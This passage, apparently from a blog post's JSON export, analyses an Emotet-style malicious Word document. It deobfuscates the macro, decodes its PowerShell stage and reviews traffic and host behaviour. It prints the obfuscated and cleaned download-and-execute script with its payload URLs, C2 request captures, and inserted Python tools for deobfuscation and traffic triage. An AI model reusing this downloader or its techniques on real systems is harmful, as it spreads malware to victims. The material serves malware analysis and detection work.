ugCunPaK(&quot;gsbuMzRpUVs&quot;)).Run$ dZmAMvagz<\/pre>\n<p>the &#8220;uMvWKNsFzRd&#8221; function is called first, which runs this line of code:<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\nuMvWKNsFzRd = ugCunPaK(&quot;FEdDZxrN&quot;) + ugCunPaK(&quot;eZumagfGLaB&quot;) + ugCunPaK(&quot;tAxtxcsvzy&quot;)<\/pre>\n<p>That calls &#8220;ugCunPaK&#8221; three times, passing &#8220;FEdDZxrN,&#8221; &#8220;eZumagfGLaB,&#8221; and &#8220;tAxtxcsvzy&#8221; as the parameter. Each call looks up the custom property of that name in the Word file, and the three values concatenate to &#8216;Wscript.&#8217;. Control then passes back to the GnLpEPBGuvx function, which does the same thing again with &#8220;hafbyEHH&#8221; and &#8220;gsbuMzRpUVs&#8221; as the parameters to get the rest of the ProgID. 
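Pruning the decoy functions and resolving the property lookups by hand works for one document, but not for a campaign's worth of them. The Python below is an added example, not code from the original post or from any of the tools mentioned on it: it walks the call graph from autoopen to discard the unreachable procedures, drops the never-assigned (Empty) padding variables, inlines the ugCunPaK lookups from a table of property values, and folds the string fragments back together. The macro text is a trimmed copy of the one dumped above, and the property values are the results this post reports; the three-way split of 'Wscript.' across FEdDZxrN, eZumagfGLaB and tAxtxcsvzy is an assumption, since the post only gives their combined value.

```python
"""Added example (not from the original post): prune the macro's decoy
procedures and resolve its document-property lookups without opening Word."""
import re

# Trimmed copy of the macro dumped above: two junk functions plus everything
# reachable from autoopen (indentation normalised to spaces).
MACRO = '''Attribute VB_Name = "Module1"
Function tBXRpcutKGy()
ReDim aUyMWUfX(7772)
aUyMWUfX(5756) = YrpPPTVkfY
End Function
Sub autoopen()
    GnLpEPBGuvx
End Sub
Public Function ugCunPaK(sTzHXsUeNU)
    ugCunPaK = ActiveDocument.CustomDocumentProperties(sTzHXsUeNU) + UrwupfwKDga + ydwzhPhAVZ
End Function
Public Function dZmAMvagz()
    fbtDPfDett = ugCunPaK("LfRkbnymP") + UrwupfwKDga + ugCunPaK("KaGzyXtDkNm") + ugCunPaK("NfKBcxXvzGh") + ugCunPaK("BDwuRPNPN")
    amRFZWXULCs = ugCunPaK("kgvXgFbt") + ugCunPaK("gTmRgTPkG") + ugCunPaK("VNbtSPzwZ") + ugCunPaK("UmCYHMCwU") + ugCunPaK("nmPWNzEc")
    SekyzxBsr = amRFZWXULCs + fbtDPfDett
    dZmAMvagz = SekyzxBsr + ActiveDocument.BuiltInDocumentProperties("Comments") + ""
End Function
Public Function uMvWKNsFzRd()
    uMvWKNsFzRd = ugCunPaK("FEdDZxrN") + ugCunPaK("eZumagfGLaB") + ugCunPaK("tAxtxcsvzy") + KchPUyEn
End Function
Public Function GnLpEPBGuvx()
    CreateObject(uMvWKNsFzRd + ugCunPaK("hafbyEHH") + ugCunPaK("gsbuMzRpUVs")).Run$ dZmAMvagz + LHxhzkDv, 0
End Function
Function KWgbkykHZP()
RfxRMkmmzZ(1286) = xXcDTbkGSW
End Function
'''

# Property values as the post reports them. The three-way split of "Wscript."
# is an assumption; the post only gives the combined value.
CUSTOM_PROPS = {
    'FEdDZxrN': 'Wsc', 'eZumagfGLaB': 'ript', 'tAxtxcsvzy': '.',
    'hafbyEHH': 'SH', 'gsbuMzRpUVs': 'ell',
    'LfRkbnymP': 'l', 'KaGzyXtDkNm': '-', 'NfKBcxXvzGh': 'e', 'BDwuRPNPN': ' ',
    'kgvXgFbt': 'p', 'gTmRgTPkG': 'o', 'VNbtSPzwZ': 'we', 'UmCYHMCwU': 'rsh', 'nmPWNzEc': 'el',
}

PROC_RE = re.compile(r'^(?:Public\s+|Private\s+)?(?:Function|Sub)\s+(\w+)\s*\(.*?\n(.*?)^End (?:Function|Sub)',
                     re.S | re.M)
LIT_PAIR = re.compile(r'"([^"]*)"\s*\+\s*"([^"]*)"')            # "a" + "b"
LIT_ASSIGN = re.compile(r'^\s*(\w+)\s*=\s*"([^"]*)"\s*$', re.M)  # x = "literal"

def split_procedures(vba):
    return {m.group(1): m.group(2) for m in PROC_RE.finditer(vba)}

def reachable(procs, entry='autoopen'):
    """Procedures on some call path from the entry point; the rest are decoys."""
    seen, todo = set(), [entry]
    while todo:
        name = todo.pop()
        if name in procs and name not in seen:
            seen.add(name)
            todo += [w for w in re.findall(r'\b[A-Za-z_]\w*\b', procs[name]) if w in procs]
    return seen

def decoy_procedures(vba, entry='autoopen'):
    procs = split_procedures(vba)
    return sorted(set(procs) - reachable(procs, entry))

def assigned_names(vba):
    """Everything that is ever defined; any other name after a '+' is Empty."""
    names = set(re.findall(r'^\s*(\w+)\s*(?:\([^)]*\))?\s*=', vba, re.M))
    names |= set(re.findall(r'^\s*(?:Dim|ReDim)\s+(\w+)', vba, re.M))
    names |= set(re.findall(r'^\s*(?:Public\s+|Private\s+)?(?:Function|Sub)\s+(\w+)', vba, re.M))
    return names | {'ActiveDocument', 'CreateObject'}

def fold_literals(body):
    while True:
        folded = LIT_PAIR.sub(lambda m: '"%s%s"' % (m.group(1), m.group(2)), body)
        if folded == body:
            return body
        body = folded

def simplify(body, assigned, props):
    # '+ name' with name never assigned is '+ Empty' in VBA, i.e. a no-op
    body = re.sub(r'\s*\+\s*([A-Za-z_]\w*)\b(?![\w.(])',
                  lambda m: '' if m.group(1) not in assigned else m.group(0), body)
    # ugCunPaK("x") is just a lookup in the Custom properties table
    body = re.sub(r'ugCunPaK\("(\w+)"\)', lambda m: '"%s"' % props[m.group(1)], body)
    return fold_literals(body)

def propagate(body, consts):
    """Replace names that are known to hold a literal, then re-fold."""
    for name, lit in consts.items():
        body = re.sub(r'(?<![\w"$])%s\b(?!\s*[=(])' % re.escape(name), '"%s"' % lit, body)
    return fold_literals(body)

def deobfuscate(vba, props, entry='autoopen'):
    procs = split_procedures(vba)
    assigned = assigned_names(vba)
    bodies = {n: simplify(procs[n], assigned, props) for n in reachable(procs, entry)}
    consts = {}
    while True:  # constant-propagate across statements and procedures until stable
        for body in bodies.values():
            consts.update(LIT_ASSIGN.findall(body))
        new = {n: propagate(b, consts) for n, b in bodies.items()}
        if new == bodies:
            return bodies
        bodies = new
```

Calling deobfuscate(MACRO, CUSTOM_PROPS) leaves five procedures; GnLpEPBGuvx collapses to CreateObject("Wscript.SHell").Run$ dZmAMvagz, 0 and dZmAMvagz to "powershell-e " plus the Comments property, which is exactly the picture worked out by hand above. The property table is the only per-sample input; everything else is generic to this obfuscator style.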
<\/p>\n<p>After doing this several times throughout the script, we get the following cleaned up script (the resolved property values are shown inline as string literals):<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\nSub autoopen()\r\n\tGnLpEPBGuvx\r\nEnd Sub\r\n\r\nPublic Function GnLpEPBGuvx()\r\n\tCreateObject(&quot;Wscript.&quot; + &quot;SH&quot; + &quot;ell&quot;).Run$ dZmAMvagz, 0    ' WScript.Shell; window style 0 = hidden\r\nEnd Function\r\n\r\nPublic Function dZmAMvagz()\r\n\tfbtDPfDett = &quot;l&quot; + &quot;-&quot; + &quot;e&quot; + &quot; &quot;                    ' &quot;l-e &quot;\r\n\tamRFZWXULCs = &quot;p&quot; + &quot;o&quot; + &quot;we&quot; + &quot;rsh&quot; + &quot;el&quot;          ' &quot;powershel&quot;\r\n\tSekyzxBsr = amRFZWXULCs + fbtDPfDett                    ' &quot;powershell-e &quot;\r\n\tdZmAMvagz = SekyzxBsr + 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\r\nEnd Function<\/pre>\n<p>So the command handed to WScript.Shell is PowerShell with its -e (-EncodedCommand) switch, and the long string in the Comments field is nothing more than the base64 encoding of the UTF-16LE command text. It looks like this when decoded:<\/p>\n<pre class=\"brush: plain; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\n${w`sCR`IPT} = .(&quot;{1}{0}{2}&quot; -f 'objec','new-','t') -ComObject (&quot;{4}{0}{3}{2}{1}&quot;-f'rip','Shell','.','t','WSc');\r\n${WEBc`liE`NT} = .(&quot;{3}{2}{0}{1}&quot;-f 'je','ct','ew-ob','n') (&quot;{3}{2}{0}{4}{1}&quot; -f 't','t','.Ne','System','.WebClien');\r\n${RAn`d`Om} = .(&quot;{0}{2}{1}&quot;-f'ne','-object','w') (&quot;{1}{0}{2}&quot;-f 'o','rand','m');\r\n${u`RLS} = (&quot;{0}{17}{20}{30}{28}{29}{3}{11}{15}{23}{21}{25}{16}{2}{7}{13}{12}{27}{10}{4}{19}{1}{24}{5}{9}{18}{14}{6}{26}{22}{8}&quot; -f 
'h','m\/JlT','reb.com\/SO','y','hocompro.c','tp:\/\/okie','hCgGO\/,http:\/\/qdecisions.com','ghVS\/,','z\/','mboci','\/\/','\/capacitaci','t','h','na.pl\/i','on\/b','e','ttp:\/\/we','a','o','rne','LT','Lrwj','M','szW\/,ht','BrcIE\/,http:\/\/v','\/','tp:','eim.c','om.u','rbernh').(&quot;{0}{1}&quot;-f'Spli','t').Invoke(',');\r\n${na`Me} = ${RAND`Om}.(&quot;{1}{0}&quot; -f 'xt','ne').Invoke(1, 65536);\r\n${Pa`TH} = ${e`Nv:tEMP} + '\\' + ${nA`mE} + (&quot;{1}{0}&quot;-f'exe','.');foreach(${u`Rl} in ${Ur`lS}){try{${wEb`CliE`Nt}.(&quot;{2}{0}{3}{1}&quot; -f 'l','File','Down','oad').Invoke(${U`RL}.(&quot;{0}{1}&quot;-f'T','oString').Invoke(), ${pA`TH});.(&quot;{0}{1}{2}&quot;-f'Start-Pr','oce','ss') ${p`AtH};break;}catch{.(&quot;{0}{2}{1}&quot; -f'write-h','st','o') ${_}.&quot;ExcEPt`i`On&quot;.&quot;mEsS`AGe&quot;;}}<\/pre>\n<p>The decoded block looks odd because, underneath the base64 layer, it stacks a few more tricks on the same command. The main one is the format operator (http:\/\/ss64.com\/ps\/syntax-f-operator.html): &#8216;-f&#8217; fills the numbered {n} placeholders in the format string from the list of fragments that follows it, so the fragments can be shuffled out of order and every command name and URL is chopped into pieces. On top of that, the variable and member names carry stray backticks (${w`sCR`IPT}, .&quot;ExcEPt`i`On&quot;), which PowerShell treats as escape characters and simply drops, and commands are invoked through the call operator with a string name (.(&quot;new-object&quot;)) rather than spelled out. None of that changes what runs; it only defeats keyword searches over the base64-decoded text. 
For example:<\/p>\n<pre class=\"brush: plain; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\n&quot;{1}{0}{2}&quot; -f 'objec','new-','t' --&gt; 0 = objec | 1 = new- | 2 = t ==&gt; new-object<\/pre>\n<p>Walking through the whole script with that in mind, and tidying the variable names, you get the following. The URL list is one long comma-separated string that is split into an array, and the &quot;{2}{0}{3}{1}&quot; -f 'l','File','Down','oad' call resolves to DownloadFile:<\/p>\n<pre class=\"brush: plain; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\n$wscript   = New-Object -ComObject WScript.Shell\r\n$webclient = New-Object System.Net.WebClient\r\n$random    = New-Object Random\r\n$urls = ('http:\/\/wernerbernheim.com.uy\/capacitacion\/bMLTBrcIE\/,http:\/\/vereb.com\/SOghVS\/,http:\/\/hocompro.com\/JlTszW\/,http:\/\/okiembociana.pl\/ihCgGO\/,http:\/\/qdecisions.com\/Lrwjz\/').Split(',')\r\n$name = $random.Next(1, 65536)\r\n$path = $env:TEMP + '\\' + $name + '.exe'\r\nforeach ($url in $urls) {\r\n    try {\r\n        $webclient.DownloadFile($url.ToString(), $path)\r\n        Start-Process $path\r\n        break\r\n    } catch {\r\n        Write-Host $_.Exception.Message\r\n    }\r\n}<\/pre>\n<p>Note the try\/break structure: the five URLs are tried in order and the loop stops at the first one that downloads and launches successfully, which is why only wernerbernheim[.]com[.]uy shows up in the PCAP. The other four are fallbacks and are worth blocking as well. The downloaded file gets a random numeric name with an .exe extension in %TEMP%.<\/p>\n<p>The faster way to decode the above script, instead of doing it manually, is to use PowerShell itself. 
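Alternatively, if you would rather not feed any of the sample's text to a PowerShell interpreter at all, the same three layers (base64 of UTF-16LE, the -f reordering, and the backtick-mangled names) can be peeled off in Python. The script below is an added example, not from the original post. It works on the decoded text shown above, re-encoded here the way powershell -e expects it (a constructed stand-in for the Comments blob, which is not reproduced on this page), and finishes by pulling out the download URLs in the order the loop tries them.

```python
"""Added example (not from the original post): peel the PowerShell stage's
three obfuscation layers in Python, without executing any of it."""
import base64
import re

# The decoded command as printed in the post (line breaks as in the dump).
DECODED = r'''${w`sCR`IPT} = .("{1}{0}{2}" -f 'objec','new-','t') -ComObject ("{4}{0}{3}{2}{1}"-f'rip','Shell','.','t','WSc');
${WEBc`liE`NT} = .("{3}{2}{0}{1}"-f 'je','ct','ew-ob','n') ("{3}{2}{0}{4}{1}" -f 't','t','.Ne','System','.WebClien');
${RAn`d`Om} = .("{0}{2}{1}"-f'ne','-object','w') ("{1}{0}{2}"-f 'o','rand','m');
${u`RLS} = ("{0}{17}{20}{30}{28}{29}{3}{11}{15}{23}{21}{25}{16}{2}{7}{13}{12}{27}{10}{4}{19}{1}{24}{5}{9}{18}{14}{6}{26}{22}{8}" -f 'h','m/JlT','reb.com/SO','y','hocompro.c','tp://okie','hCgGO/,http://qdecisions.com','ghVS/,','z/','mboci','//','/capacitaci','t','h','na.pl/i','on/b','e','ttp://we','a','o','rne','LT','Lrwj','M','szW/,ht','BrcIE/,http://v','/','tp:','eim.c','om.u','rbernh').("{0}{1}"-f'Spli','t').Invoke(',');
${na`Me} = ${RAND`Om}.("{1}{0}" -f 'xt','ne').Invoke(1, 65536);
${Pa`TH} = ${e`Nv:tEMP} + '\' + ${nA`mE} + ("{1}{0}"-f'exe','.');foreach(${u`Rl} in ${Ur`lS}){try{${wEb`CliE`Nt}.("{2}{0}{3}{1}" -f 'l','File','Down','oad').Invoke(${U`RL}.("{0}{1}"-f'T','oString').Invoke(), ${pA`TH});.("{0}{1}{2}"-f'Start-Pr','oce','ss') ${p`AtH};break;}catch{.("{0}{2}{1}" -f'write-h','st','o') ${_}."ExcEPt`i`On"."mEsS`AGe";}}'''

# Constructed stand-in for the blob in the Comments field: `powershell -e`
# expects base64 of the UTF-16LE command text, so build it the same way.
ENCODED = base64.b64encode(DECODED.encode('utf-16-le')).decode('ascii')

def decode_encoded_command(b64):
    """Reverse of what -EncodedCommand does."""
    return base64.b64decode(b64).decode('utf-16-le')

# ("{1}{0}" -f 'b','a')  ->  ('ab')
FORMAT_RE = re.compile(r'''\(\s*"((?:\{\d+\})+)"\s*-f\s*((?:'[^']*'\s*,?\s*)+)\)''')

def resolve_format_operator(text):
    def fill(m):
        order = [int(i) for i in re.findall(r'\{(\d+)\}', m.group(1))]
        frags = re.findall(r"'([^']*)'", m.group(2))
        return "('" + ''.join(frags[i] for i in order) + "')"
    return FORMAT_RE.sub(fill, text)

def strip_backticks(text):
    """A backtick inside ${...} or a quoted member name only escapes the next
    character, so ${w`sCR`IPT} is $wsCRIPT and ."ExcEPt`i`On" is .ExcEPtiOn."""
    text = re.sub(r'\$\{([^}]*)\}', lambda m: '$' + m.group(1).replace('`', ''), text)
    return re.sub(r'\."([A-Za-z`]+)"', lambda m: '.' + m.group(1).replace('`', ''), text)

def unwrap_invocations(text):
    """.('Method').Invoke(a) -> .Method(a); .('cmd') -> cmd; ('lit') -> 'lit'."""
    text = re.sub(r"\.\('([^']+)'\)\.Invoke\(", r'.\1(', text)
    text = re.sub(r"\.\('([^']+)'\)", r'\1', text)
    return re.sub(r"(?<![\w.])\('([^']*)'\)", r"'\1'", text)

def deobfuscate(b64):
    text = decode_encoded_command(b64)
    return unwrap_invocations(strip_backticks(resolve_format_operator(text)))

def payload_urls(script):
    """Download URLs in the order the loop tries them (first success wins)."""
    return list(dict.fromkeys(re.findall(r"https?://[^\s'\",;)]+", script)))

if __name__ == '__main__':
    clean = deobfuscate(ENCODED)
    print(clean)
    print(payload_urls(clean))
```

The -f handler is the only part that needs thought: it reads the placeholder order from the format string and indexes into the fragment list, which is the same thing PowerShell does, minus the interpreter. The rest is plain string surgery, and none of it evaluates anything, so it is safe to run on a blob you have not looked at yet.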
To use the PowerShell approach, take one of the lines above, for example the one for &#8220;${w`sCR`IPT}&#8221;, and type it at the PowerShell prompt prefixed with write-host, i.e. write-host ${w`sCR`IPT} = .(&#8220;{1}{0}{2}&#8221; -f &#8216;objec&#8217;,&#8217;new-&#8216;,&#8217;t&#8217;) -ComObject (&#8220;{4}{0}{3}{2}{1}&#8221;-f&#8217;rip&#8217;,&#8217;Shell&#8217;,&#8217;.&#8217;,&#8217;t&#8217;,&#8217;WSc&#8217;); as seen below. The parenthesised -f expressions are evaluated as subexpressions, which is what makes the reordered strings pop out. Keep in mind that this is still handing the sample&#8217;s own text to the interpreter, so do it only in an isolated VM and skip the line that contains DownloadFile and Start-Process; evaluating just the format expression on its own (&quot;{1}{0}{2}&quot; -f &#8216;objec&#8217;,&#8217;new-&#8216;,&#8217;t&#8217;) is the safer habit.<\/p>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2017\/08\/Powershell.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2017\/08\/Powershell.png\" alt=\"\" width=\"1682\" height=\"132\" class=\"aligncenter size-full wp-image-941\" \/><\/a><\/p>\n<p>Note: I didn&#8217;t know about the above method until I read @dvk01uk&#8217;s post. Thanks for the tip dvk01uk!<\/p>\n<p>Analysis:<br \/>\n=========<br \/>\nFrom the network traffic perspective, once the maldoc is run, there is the initial call to the site &#8216;wernerbernheim[.]com[.]uy\/capacitacion\/bMLTBrcIE\/&#8217; to download the malicious binary:<\/p>\n<pre class=\"brush: plain; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\nGET \/capacitacion\/bMLTBrcIE\/ HTTP\/1.1\r\nHost: wernerbernheim.com.uy\r\nConnection: Keep-Alive\r\n\r\nHTTP\/1.1 200 OK\r\nCache-Control: no-cache, no-store, max-age=0, must-revalidate\r\nPragma: no-cache\r\nContent-Type: application\/octet-stream\r\nServer: Microsoft-IIS\/8.5\r\nContent-Disposition: attachment; filename=&quot;GVhZFRnuDfWvPO.exe&quot;\r\nContent-Transfer-Encoding: binary\r\nX-Powered-By: ASP.NET\r\nX-Powered-By-Plesk: PleskWin\r\nDate: Fri, 25 Aug 2017 11:54:24 GMT\r\nContent-Length: 86016\r\n\r\nMZ......................@.............................................\t.!..L.!This program cannot be run in DOS mode.\r\n\r\n$.........d=..<\/pre>\n<p>The response is worth a second look for detection purposes: the server sends the file as application\/octet-stream from an extensionless URI path and supplies the .exe name only in the Content-Disposition header, and the Content-Length of 86016 matches the 84KB binary in the artifact list. The PowerShell stage saves it under %TEMP% (the script builds the name from Random.Next(1, 65536) plus .exe). 
Next, from what I can piece together from the separate runs of the malware and the ensuing PCAPs, the malicious binary that was downloaded then starts calling out in the form of POST requests using both port 443 (not HTTPS though), and port 8080:<\/p>\n<pre class=\"brush: plain; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\nPOST \/ HTTP\/1.1\r\nUser-Agent: Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident\/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)\r\nHost: 62.39.95.185:443\r\nContent-Length: 500\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nQ7.....b..).....s......O.....ty.\r\n............I.Q*4s4..O!...jg......vt.&gt;..s%G0n.......2.V......n..o%EJwI.7MT.f...QY-.k...U...!v..............cq..;.......LTA...84.Gkk.K....@....n...p\r\nVy......]OLE..O.~..1 ....6,.t.`.........Q*D..H($..` W....{............0.:.)........|.&#x5B;.NEN.....{.&#x5B;.VH$.........&quot;..`.7Vt.17.:1.......%\r\n..N_..B...OH..\r\n..X..o.\/...{.....).....l.t..W......Eb..l.e..g....n...2c......J..3........&gt;Hv4...r.d.._h.......$.|.W4.$e.X.U*..GI3Sd.Y.4C.{..wXC.............9...&#x5B;\/.J.&gt;4=..+....y....*C..v.\r\n\r\nHTTP\/1.1 404 Not Found\r\nServer: nginx\r\nDate: Fri, 25 Aug 2017 11:56:30 GMT\r\nContent-Type: text\/html; charset=UTF-8\r\nContent-Length: 132\r\nConnection: keep-alive\r\n\r\n.)I..,.....{_n..b...SMh..q).H......)KyC.P.8J.Z...zdm.g\/]2.E..n\r\n...:.Q.\t.....=&gt;~.....d..1..t..{.HEZ..{.C|...D...&#x5B;.r.&#x5B;7..PwQ...|.c..!.\r\n\r\n-----\r\n\r\nPOST \/ HTTP\/1.1\r\nUser-Agent: Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident\/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)\r\nHost: 104.236.252.178:8080\r\nContent-Length: 516\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n..c..\r\n. 
\\..r.hm.........1.t.F.ee.~....E#1w....qD...{\r\n\t......\r\n.......?j..~..}.....].d...,....j..\r\n..:%H+X....cD.\/`&lt;rb.....b...8....}........)!....9.G..a..dz..Y..~...dl.....v.....u.3-&quot;....K$... ...&quot;.nT...az,Rt...@.._T8.@m..\t..t-.....d...Ew.Vm.rX..&lt;..T......Q...]...G.\/...5......G..k...C.&amp;#ePi.e..#..|.fL|...].L.-..6.....E.wB....p..e)u....Zr)A_.\\Y.K.,X..(........oGi.....FwE..j(..?..Y.&amp;.\t.\r\n.HT..%y...6..IU.....od..T.T?..YZFL......]|o.YC*....s..*..8.R:.....&#x5B;,.0.RZ&lt;!:...k..2...Sp...&#x5B;S...^...\t.T0?r...3......7..8_...o.....\r\n\r\nHTTP\/1.1 404 Not Found\r\nServer: nginx\r\nDate: Mon, 28 Aug 2017 09:04:05 GMT\r\nContent-Type: text\/html; charset=UTF-8\r\nContent-Length: 132\r\nConnection: keep-alive\r\n\r\n.)I..,.....{_n..b...SMh..q).H......)KyC.P.8J.Z...zdm.g\/]2.E..n\r\n...:.Q.\t.....=&gt;~.....d..1..t..{.HEZ..{.C|...D...&#x5B;.r.&#x5B;{.......&lt;.&gt;..e..<\/pre>\n<p>Two things about those POSTs stand out. Both go to a bare IP address with the port carried in the Host header, and the one to 62.39.95.185 is plain HTTP on TCP 443 rather than TLS, so anything that only inspects 443 as TLS will not see it. The servers answer 404 Not Found, but each response carries a 132-byte body that is not HTML despite the text\/html Content-Type, which is worth keeping in mind before writing those IPs off as dead.<\/p>\n<p>From the host perspective, this is pretty straightforward. The file &#8220;GVhZFRnuDfWvPO.exe&#8221; executes and spawns another copy of itself from the same location. This instance of &#8220;GVhZFRnuDfWvPO.exe&#8221; then performs a SetRenameInformationFile operation and creates the file &#8220;serviceprov.exe&#8221;, which is the same file (same MD5) as &#8220;GVhZFRnuDfWvPO.exe&#8221; but now in a new location &#8211; C:\\Users\\%username%\\AppData\\Local\\Microsoft\\Windows. 
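Before finishing the host side, the download and the two POSTs above have a handful of traits that are easy to turn into a triage check: an executable served as application/octet-stream from an extensionless path with its name only in Content-Disposition, POSTs to a bare IP with the port in the Host header, plain HTTP on 443, no Content-Type on an opaque body, the hard-coded MSIE 7.0 User-Agent, and 404 responses that still carry a non-HTML body. The Python below is an added example, not from the original post; the sample messages are constructed from the headers in the captures above, with stand-in bodies, and the benign messages are made up for contrast.

```python
"""Added example (not from the original post): triage raw HTTP messages for the
traits seen in this sample's download and post-infection POSTs."""
import re
from ipaddress import ip_address

def parse_http(raw):
    """Split a raw HTTP message into (start line, lower-cased header dict, body)."""
    head, _, body = raw.partition(b'\r\n\r\n')
    lines = head.decode('latin-1').split('\r\n')
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(':')
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body

def triage_request(raw):
    """Indicators on a client request, in a fixed order."""
    start, h, body = parse_http(raw)
    method, uri = start.split(' ')[:2]
    host, _, port = h.get('host', '').partition(':')
    findings = []
    try:
        ip_address(host)
        findings.append('host-is-bare-ip')           # C2 addressed by IP, no DNS name
    except ValueError:
        pass
    if port == '443':
        findings.append('plaintext-http-on-443')     # HTTP, not TLS, on the TLS port
    if method == 'POST' and uri == '/' and body and 'content-type' not in h:
        findings.append('untyped-post-to-root')      # opaque blob, no form/JSON type
    if 'MSIE 7.0' in h.get('user-agent', ''):
        findings.append('legacy-msie-ua')            # hard-coded Trident/7.0 string
    return findings

def triage_response(raw, request_uri=''):
    """Indicators on a server reply, given the URI that was requested."""
    start, h, body = parse_http(raw)
    status = start.split(' ')[1]
    findings = []
    m = re.search(r'filename="?([^";]+)', h.get('content-disposition', ''))
    if m and m.group(1).lower().endswith('.exe') and body.startswith(b'MZ'):
        findings.append('exe-download')
        if not request_uri.lower().endswith('.exe'):
            findings.append('exe-from-extensionless-uri')
    if status == '404' and body and not body.lstrip().startswith(b'<'):
        findings.append('404-with-non-html-body')   # "not found" that still carries data
    return findings

# Constructed from the headers in the captures above; bodies are stand-ins.
UA = (b'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; '
      b'.NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)')
GET_REPLY = (b'HTTP/1.1 200 OK\r\nContent-Type: application/octet-stream\r\n'
             b'Server: Microsoft-IIS/8.5\r\n'
             b'Content-Disposition: attachment; filename="GVhZFRnuDfWvPO.exe"\r\n'
             b'Content-Length: 86016\r\n\r\n' + b'MZ\x90\x00\x03\x00\x00\x00')
POST_443 = (b'POST / HTTP/1.1\r\nUser-Agent: ' + UA + b'\r\nHost: 62.39.95.185:443\r\n'
            + b'Content-Length: 500\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n'
            + b'Q7' + b'\x00' * 498)
POST_8080 = (b'POST / HTTP/1.1\r\nUser-Agent: ' + UA + b'\r\nHost: 104.236.252.178:8080\r\n'
             + b'Content-Length: 516\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n'
             + b'\x00' * 516)
POST_REPLY = (b'HTTP/1.1 404 Not Found\r\nServer: nginx\r\nContent-Type: text/html; charset=UTF-8\r\n'
              b'Content-Length: 132\r\nConnection: keep-alive\r\n\r\n' + bytes(range(132)))
# Made-up benign traffic for contrast.
BENIGN_GET = b'GET /index.html HTTP/1.1\r\nHost: www.example.com\r\nUser-Agent: Mozilla/5.0\r\n\r\n'
BENIGN_404 = b'HTTP/1.1 404 Not Found\r\nContent-Type: text/html\r\n\r\n<html><body>Not Found</body></html>'

if __name__ == '__main__':
    for label, msg in [('POST 443', POST_443), ('POST 8080', POST_8080), ('benign GET', BENIGN_GET)]:
        print(label, triage_request(msg))
    print('GET reply', triage_response(GET_REPLY, '/capacitacion/bMLTBrcIE/'))
    print('POST reply', triage_response(POST_REPLY))
```

The checks are per-message and deliberately simple so that each one maps onto a proxy or IDS rule; run them over streams reassembled from the PCAP rather than on individual packets, since the request body and the reply's first bytes are what the checks look at. None of them is conclusive alone (plenty of software still posts to bare IPs), but the four request findings together, followed by a 404 that carries data, are a strong pattern.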
This initial instance proceeds to spawn another copy of itself, and that copy is the process responsible for the POST requests seen above in the PCAP.<\/p>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2017\/08\/Comms.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2017\/08\/Comms.png\" alt=\"\" width=\"684\" height=\"302\" class=\"aligncenter size-full wp-image-939\" \/><\/a><\/p>\n<p>Also, looking into the ProcMon log, I can see that it is this process that is looking through different folders within my VM (i.e. Windows History, cookies, etc&#8230;). Lastly, we see that the process writes an entry for itself to the registry to establish persistence: <\/p>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2017\/08\/Persistence.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2017\/08\/Persistence.png\" alt=\"\" width=\"988\" height=\"450\" class=\"aligncenter size-full wp-image-940\" \/><\/a><\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[10,4],"tags":[12],"class_list":["post-938","post","type-post","status-publish","format-standard","hentry","category-code","category-packet-analysis","tag-emotet"],"_links":{"self":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/938","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=938"}],"version-history":[{"count":4,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/938\/revisions"}],"predecessor-version":[{"id":948,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/938\/revisions\/948"}],"wp:attachment":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=938"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=938"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.herbie